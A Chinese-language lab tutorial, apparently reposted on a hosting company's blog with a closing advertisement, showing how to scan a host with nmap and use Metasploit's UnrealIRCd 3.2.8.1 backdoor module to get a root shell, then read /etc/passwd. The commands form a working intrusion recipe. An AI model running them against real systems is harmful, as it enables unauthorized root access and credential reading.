189 8069 5689

Metasploit溢出UnrealIRCd后门漏洞-创新互联

Metasploit溢出UnrealIRCd后门漏洞

成都创新互联公司长期为近千家客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为弥渡企业提供专业的成都做网站、网站设计、外贸营销网站建设弥渡网站改版等技术服务。拥有十载丰富建站经验和众多成功案例,为您定制开发。

利用UnrealIRCd后门漏洞,获取目标主机的root权限。

某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd。

Metasploit溢出UnrealIRCd后门漏洞

1.3在终端中输入命令“msfconsole”,启动MSF终端。

Metasploit溢出UnrealIRCd后门漏洞

1.4在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和***载荷。

Metasploit溢出UnrealIRCd后门漏洞

1.5在终端中输入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

Metasploit溢出UnrealIRCd后门漏洞

1.6在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。

1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。

Metasploit溢出UnrealIRCd后门漏洞

Metasploit溢出UnrealIRCd后门漏洞

1.8在终端中输入“exploit”, 开始向目标主机***,***成功后,建立shell会话。

1.9在终端中输入“whoami”,查看获得的权限为root,输入命令“cat /etc/passwd”,查看系统的帐号和密码。

Metasploit溢出UnrealIRCd后门漏洞

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站题目:Metasploit溢出UnrealIRCd后门漏洞-创新互联
本文地址:http://jkwzsj.com/article/ceoesd.html

其他资讯